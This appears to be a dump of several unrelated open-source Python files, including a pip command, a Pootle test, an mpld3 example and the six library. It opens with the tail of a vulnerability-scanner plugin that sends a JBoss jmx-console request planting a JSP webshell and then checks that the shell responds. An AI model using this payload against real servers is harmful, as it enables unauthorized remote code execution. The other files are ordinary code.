name = random_str(5)
for v in shell:
shellcode += hex(ord(v)).replace("0x", "%")
flag = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=" + \
"java.lang.String&arg0=%s.war&argType=java.lang.String&arg1=xunfeng&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" % (
name) + shellcode + \
"&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"
s1.send(flag)
data = s1.recv(512)
s1.close()
time.sleep(10)
url = "http://%s:%d" % (host, int(port))
webshell_url = "%s/%s/xunfeng.jsp" % (url, name)
res = urllib2.urlopen(webshell_url, timeout=timeout)
if 'comments' in res.read():
info = u"Jboss Authentication bypass webshell:%s" % (webshell_url)
return info
except Exception, e:
pass
| gpl-3.0 |
djeraseit/eucalyptus | clc/eucadmin/eucadmin/describetokens.py | 6 | 1513 | # Copyright 2011-2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import eucadmin.describerequest
class DescribeTokens(eucadmin.describerequest.DescribeRequest):
ServiceName = 'Tokens'
Description = 'List Tokens services.'
| gpl-3.0 |
JohnnyKing94/pootle | tests/pootle_language/panels.py | 7 | 1800 | # -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import pytest
from django.template import loader
from pootle.core.browser import get_table_headings
from pootle.core.delegate import panels
from pootle_app.models.permissions import get_matching_permissions
from pootle_app.panels import ChildrenPanel
from pootle_language.views import LanguageBrowseView
@pytest.mark.django_db
def test_panel_language_table(language0, rf, member):
request = rf.get('/language0/')
request.user = member
request.permissions = get_matching_permissions(
request.user,
language0.directory)
view = LanguageBrowseView(
kwargs=dict(language_code=language0.code))
view.request = request
view.object = view.get_object()
lang_panels = panels.gather(LanguageBrowseView)
assert lang_panels.keys() == ["children"]
assert lang_panels["children"] == ChildrenPanel
panel = ChildrenPanel(view)
assert panel.panel_name == "children"
assert (
panel.cache_key
== ("panel.%s.%s"
% (panel.panel_name, view.cache_key)))
table = {
'id': view.view_name,
'fields': panel.table_fields,
'headings': get_table_headings(panel.table_fields),
'rows': view.object_children}
assert panel.table == table
assert panel.get_context_data() == dict(
table=table, can_translate=view.can_translate)
content = loader.render_to_string(
panel.template_name, context=panel.get_context_data())
assert (
panel.content
== panel.update_times(content))
| gpl-3.0 |
luzfcb/pip | pip/commands/freeze.py | 311 | 2330 | from __future__ import absolute_import
import sys
import pip
from pip.basecommand import Command
from pip.operations.freeze import freeze
from pip.wheel import WheelCache
class FreezeCommand(Command):
"""
Output installed packages in requirements format.
packages are listed in a case-insensitive sorted order.
"""
name = 'freeze'
usage = """
%prog [options]"""
summary = 'Output installed packages in requirements format.'
log_streams = ("ext://sys.stderr", "ext://sys.stderr")
def __init__(self, *args, **kw):
super(FreezeCommand, self).__init__(*args, **kw)
self.cmd_opts.add_option(
'-r', '--requirement',
dest='requirement',
action='store',
default=None,
metavar='file',
help="Use the order in the given requirements file and its "
"comments when generating output.")
self.cmd_opts.add_option(
'-f', '--find-links',
dest='find_links',
action='append',
default=[],
metavar='URL',
help='URL for finding packages, which will be added to the '
'output.')
self.cmd_opts.add_option(
'-l', '--local',
dest='local',
action='store_true',
default=False,
help='If in a virtualenv that has global access, do not output '
'globally-installed packages.')
self.cmd_opts.add_option(
'--user',
dest='user',
action='store_true',
default=False,
help='Only output packages installed in user-site.')
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
format_control = pip.index.FormatControl(set(), set())
wheel_cache = WheelCache(options.cache_dir, format_control)
freeze_kwargs = dict(
requirement=options.requirement,
find_links=options.find_links,
local_only=options.local,
user_only=options.user,
skip_regex=options.skip_requirements_regex,
isolated=options.isolated_mode,
wheel_cache=wheel_cache)
for line in freeze(**freeze_kwargs):
sys.stdout.write(line + '\n')
| mit |
giserh/mpld3 | examples/custom_plugin.py | 21 | 2557 | """
Defining a Custom Plugin
========================
Test the custom plugin demoed on the `Pythonic Perambulations
<http://jakevdp.github.io/blog/2014/01/10/d3-plugins-truly-interactive/>`_
blog. Hover over the points to see the associated sinusoid.
Use the toolbar buttons at the bottom-right of the plot to enable zooming
and panning, and to reset the view.
"""
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import mpld3
from mpld3 import plugins, utils
class LinkedView(plugins.PluginBase):
"""A simple plugin showing how multiple axes can be linked"""
JAVASCRIPT = """
mpld3.register_plugin("linkedview", LinkedViewPlugin);
LinkedViewPlugin.prototype = Object.create(mpld3.Plugin.prototype);
LinkedViewPlugin.prototype.constructor = LinkedViewPlugin;
LinkedViewPlugin.prototype.requiredProps = ["idpts", "idline", "data"];
LinkedViewPlugin.prototype.defaultProps = {}
function LinkedViewPlugin(fig, props){
mpld3.Plugin.call(this, fig, props);
};
LinkedViewPlugin.prototype.draw = function(){
var pts = mpld3.get_element(this.props.idpts);
var line = mpld3.get_element(this.props.idline);
var data = this.props.data;
function mouseover(d, i){
line.data = data[i];
line.elements().transition()
.attr("d", line.datafunc(line.data))
.style("stroke", this.style.fill);
}
pts.elements().on("mouseover", mouseover);
};
"""
def __init__(self, points, line, linedata):
if isinstance(points, matplotlib.lines.Line2D):
suffix = "pts"
else:
suffix = None
self.dict_ = {"type": "linkedview",
"idpts": utils.get_id(points, suffix),
"idline": utils.get_id(line),
"data": linedata}
fig, ax = plt.subplots(2)
# scatter periods and amplitudes
np.random.seed(0)
P = 0.2 + np.random.random(size=20)
A = np.random.random(size=20)
x = np.linspace(0, 10, 100)
data = np.array([[x, Ai * np.sin(x / Pi)]
for (Ai, Pi) in zip(A, P)])
points = ax[1].scatter(P, A, c=P + A,
s=200, alpha=0.5)
ax[1].set_xlabel('Period')
ax[1].set_ylabel('Amplitude')
# create the line object
lines = ax[0].plot(x, 0 * x, '-w', lw=3, alpha=0.5)
ax[0].set_ylim(-1, 1)
ax[0].set_title("Hover over points to see lines")
# transpose line data and add plugin
linedata = data.transpose(0, 2, 1).tolist()
plugins.connect(fig, LinkedView(points, lines[0], linedata))
mpld3.show()
| bsd-3-clause |
kushalbhola/MyStuff | venv/Lib/site-packages/setuptools/_vendor/six.py | 2715 | 30098 | """Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2015 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
import functools
import itertools
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.10.0"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
PY34 = sys.version_info[0:2] >= (3, 4)
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result) # Invokes __set__.
try:
# This is a bit ugly, but it avoids running this again by
# removing this descriptor.
delattr(obj.__class__, self.name)
except AttributeError:
pass
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
def __getattr__(self, attr):
_module = self._resolve()
value = getattr(_module, attr)
setattr(self, attr, value)
return value
class _LazyModule(types.ModuleType):
def __init__(self, name):
super(_LazyModule, self).__init__(name)
self.__doc__ = self.__class__.__doc__
def __dir__(self):
attrs = ["__doc__", "__name__"]
attrs += [attr.name for attr in self._moved_attributes]
return attrs
# Subclasses should override this
_moved_attributes = []
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _SixMetaPathImporter(object):
"""
A meta path importer to import six.moves and its submodules.
This class implements a PEP302 finder and loader. It should be compatible
with Python 2.5 and all existing versions of Python3
"""
def __init__(self, six_module_name):
self.name = six_module_name
self.known_modules = {}
def _add_module(self, mod, *fullnames):
for fullname in fullnames:
self.known_modules[self.name + "." + fullname] = mod
def _get_module(self, fullname):
return self.known_modules[self.name + "." + fullname]
def find_module(self, fullname, path=None):
if fullname in self.known_modules:
return self
return None
def __get_module(self, fullname):
try:
return self.known_modules[fullname]
except KeyError:
raise ImportError("This loader does not know module " + fullname)
def load_module(self, fullname):
try:
# in case of a reload
return sys.modules[fullname]
except KeyError:
pass
mod = self.__get_module(fullname)
if isinstance(mod, MovedModule):
mod = mod._resolve()
else:
mod.__loader__ = self
sys.modules[fullname] = mod
return mod
def is_package(self, fullname):
"""
Return true, if the named module is a package.
We need this method to get correct spec objects with
Python 3.4 (see PEP451)
"""
return hasattr(self.__get_module(fullname), "__path__")
def get_code(self, fullname):
"""Return None
Required, if is_package is implemented"""
self.__get_module(fullname) # eventually raises ImportError
return None
get_source = get_code # same as get_code
_importer = _SixMetaPathImporter(__name__)
class _MovedItems(_LazyModule):
"""Lazy loading of moved objects"""
__path__ = [] # mark as package
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("intern", "__builtin__", "sys"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"),
MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("shlex_quote", "pipes", "shlex", "quote"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserDict", "UserDict", "collections"),
MovedAttribute("UserList", "UserList", "collections"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("dbm_gnu", "gdbm", "dbm.gnu"),
MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("_thread", "thread", "_thread"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"),
MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"),
]
# Add windows specific modules.
if sys.platform == "win32":
_moved_attributes += [
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
if isinstance(attr, MovedModule):
_importer._add_module(attr, "moves." + attr.name)
del attr
_MovedItems._moved_attributes = _moved_attributes
moves = _MovedItems(__name__ + ".moves")
_importer._add_module(moves, "moves")
class Module_six_moves_urllib_parse(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("SplitResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
MovedAttribute("splitquery", "urllib", "urllib.parse"),
MovedAttribute("splittag", "urllib", "urllib.parse"),
MovedAttribute("splituser", "urllib", "urllib.parse"),
MovedAttribute("uses_fragment", "urlparse", "urllib.parse"),
MovedAttribute("uses_netloc", "urlparse", "urllib.parse"),
MovedAttribute("uses_params", "urlparse", "urllib.parse"),
MovedAttribute("uses_query", "urlparse", "urllib.parse"),
MovedAttribute("uses_relative", "urlparse", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes
_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"),
"moves.urllib_parse", "moves.urllib.parse")
class Module_six_moves_urllib_error(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes
_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"),
"moves.urllib_error", "moves.urllib.error")
class Module_six_moves_urllib_request(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
MovedAttribute("proxy_bypass", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes
_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"),
"moves.urllib_request", "moves.urllib.request")
class Module_six_moves_urllib_response(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes
_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"),
"moves.urllib_response", "moves.urllib.response")
class Module_six_moves_urllib_robotparser(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes
_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"),
"moves.urllib_robotparser", "moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
__path__ = [] # mark as package
parse = _importer._get_module("moves.urllib_parse")
error = _importer._get_module("moves.urllib_error")
request = _importer._get_module("moves.urllib_request")
response = _importer._get_module("moves.urllib_response")
robotparser = _importer._get_module("moves.urllib_robotparser")
def __dir__(self):
return ['parse', 'error', 'request', 'response', 'robotparser']
_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"),
"moves.urllib")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
def create_unbound_method(func, cls):
return func
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
def create_unbound_method(func, cls):
return types.MethodType(func, None, cls)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
if PY3:
def iterkeys(d, **kw):
return iter(d.keys(**kw))
def itervalues(d, **kw):
return iter(d.values(**kw))
def iteritems(d, **kw):
return iter(d.items(**kw))
def iterlists(d, **kw):
return iter(d.lists(**kw))
viewkeys = operator.methodcaller("keys")
viewvalues = operator.methodcaller("values")
viewitems = operator.methodcaller("items")
else:
def iterkeys(d, **kw):
return d.iterkeys(**kw)
def itervalues(d, **kw):
return d.itervalues(**kw)
def iteritems(d, **kw):
return d.iteritems(**kw)
def iterlists(d, **kw):
return d.iterlists(**kw)
viewkeys = operator.methodcaller("viewkeys")
viewvalues = operator.methodcaller("viewvalues")
viewitems = operator.methodcaller("viewitems")
_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.")
_add_doc(itervalues, "Return an iterator over the values of a dictionary.")
_add_doc(iteritems,
"Return an iterator over the (key, value) pairs of a dictionary.")
_add_doc(iterlists,
"Return an iterator over the (key, [values]) pairs of a dictionary.")
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
import struct
int2byte = struct.Struct(">B").pack
del struct
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
_assertCountEqual = "assertCountEqual"
if sys.version_info[1] <= 1:
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
else:
_assertRaisesRegex = "assertRaisesRegex"
_assertRegex = "assertRegex"
else:
def b(s):
return s
# Workaround for standalone backslash
def u(s):
return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
iterbytes = functools.partial(itertools.imap, ord)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_assertCountEqual = "assertItemsEqual"
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
def assertCountEqual(self, *args, **kwargs):
return getattr(self, _assertCountEqual)(*args, **kwargs)
def assertRaisesRegex(self, *args, **kwargs):
return getattr(self, _assertRaisesRegex)(*args, **kwargs)
def assertRegex(self, *args, **kwargs):
return getattr(self, _assertRegex)(*args, **kwargs)
if PY3:
exec_ = getattr(moves.builtins, "exec")
def reraise(tp, value, tb=None):
if value is None:
value = tp()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
if sys.version_info[:2] == (3, 2):
exec_("""def raise_from(value, from_value):
if from_value is None:
raise value
raise value from from_value
""")
elif sys.version_info[:2] > (3, 2):
exec_("""def raise_from(value, from_value):
raise value from from_value
""")
else:
def raise_from(value, from_value):
raise value
print_ = getattr(moves.builtins, "print", None)
if print_ is None:
def print_(*args, **kwargs):
"""The new-style print function for Python 2.4 and 2.5."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
# If the file has an encoding, encode unicode with it.
if (isinstance(fp, file) and
isinstance(data, unicode) and
fp.encoding is not None):
errors = getattr(fp, "errors", None)
if errors is None:
errors = "strict"
data = data.encode(fp.encoding, errors)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
if sys.version_info[:2] < (3, 3):
_print = print_
def print_(*args, **kwargs):
fp = kwargs.get("file", sys.stdout)
flush = kwargs.pop("flush", False)
_print(*args, **kwargs)
if flush and fp is not None:
fp.flush()
_add_doc(reraise, """Reraise an exception.""")
if sys.version_info[0:2] < (3, 4):
def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
def wrapper(f):
f = functools.wraps(wrapped, assigned, updated)(f)
f.__wrapped__ = wrapped
return f
return wrapper
else:
wraps = functools.wraps
def with_metaclass(meta, *bases):
"""Create a base class with a metaclass."""
# This requires a bit of explanation: the basic idea is to make a dummy
# metaclass for one level of class instantiation that replaces itself with
# the actual metaclass.
class metaclass(meta):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
return type.__new__(metaclass, 'temporary_class', (), {})
